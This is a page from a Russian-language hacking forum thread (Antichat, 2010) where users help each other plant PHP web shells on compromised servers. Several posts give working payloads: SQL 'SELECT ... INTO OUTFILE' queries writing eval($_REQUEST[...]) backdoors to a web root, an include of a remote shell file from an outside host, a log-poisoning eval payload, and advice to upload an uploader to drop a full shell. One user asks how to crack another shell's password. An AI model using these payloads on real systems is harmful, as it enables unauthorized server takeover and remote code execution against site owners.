HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1290 из 2438 « Первая < 290790119012401280 1286 1287 1288 1289 1290 1291 1292 1293 1294 13001340139017902290 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12891  
Старый 04.05.2010, 00:23
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию
Цитата:
Сообщение от GOGA075  
Такая ситуация:
Есть PhpMyAdin права полный Root
Делаю запрос вида
select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php';
Создаеться файл .php, но когда захожу на него, там пустой белый лист!!!

А когда делаю запрос
select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php';
выводиться полный phpinfo!!

что может быть не так?

allow_url_include off скорее всего
 
Ответить с цитированием

  #12892  
Старый 04.05.2010, 00:24
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
.:[melkiy]:.
Я с табой соглашусь!

Цитата:
Сообщение от [ DSU ]  
попробуй залить include($_GET[file]) ...
А по подробнее можно. А то я раньше таким не рользовался!
 
Ответить с цитированием

  #12893  
Старый 04.05.2010, 04:47
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от GOGA075  
.:[melkiy]:.
Я с табой соглашусь!



А по подробнее можно. А то я раньше таким не рользовался!

лучше eval($_GET['shell']);


Цитата:
Сообщение от BrainDeaD  
я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.


с php вобще ничего не показывает.

возможно. как в этом случае можно глянуть какая функция используется.

там не инклюд, а читалка
 
Ответить с цитированием

  #12894  
Старый 04.05.2010, 04:59
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами: 10025299

Репутация: 412
По умолчанию
залить скрипт аплоада и через него лить уже обычный шелл

ЗЫ:Не трезв...
 
Ответить с цитированием

  #12895  
Старый 04.05.2010, 07:25
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1
 
Ответить с цитированием

  #12896  
Старый 04.05.2010, 08:29
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами: 9328706

Репутация: 1503
По умолчанию
Цитата:
Сообщение от GOGA075  
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1

Цитата:
select '<? eval(stripslashes($_REQUEST[\'var\'])); ?>' into outfile 'D:/WWW/files/shell.php';
Потом http://site.com/files/shell.php?var=phpinfo();
__________________

You may say I'm a dreamer
But I'm not the only one
Последний раз редактировалось Twoster; 04.05.2010 в 10:08..
 
Ответить с цитированием

  #12897  
Старый 04.05.2010, 09:23
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию
Цитата:
Сообщение от shell_c0de  
<?php file_get_contents('http://site.ru/<?php eval(stripslashes($_REQUEST[cmd]));?>');?>
Спасибо большое. Но чё то или я туплю или даже хз, но в логах ngnix , но в логах чё то не появляется мой запрос
 
Ответить с цитированием

  #12898  
Старый 04.05.2010, 12:09
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?
 
Ответить с цитированием

  #12899  
Старый 04.05.2010, 12:41
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
есть шелл с парольом..
как моjно наыти пароль ?
и пароль изменилось не стандартниы..
напримерь в wso парол root а здес что то друqое ..
как наыти ??
 
Ответить с цитированием

  #12900  
Старый 04.05.2010, 13:52
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от mailbrush  
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?

читалка обычная походу.. и mod_rewrite обычный
 
Ответить с цитированием
Ответ
Страница 1290 из 2438 « Первая < 290790119012401280 1286 1287 1288 1289 1290 1291 1292 1293 1294 13001340139017902290 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.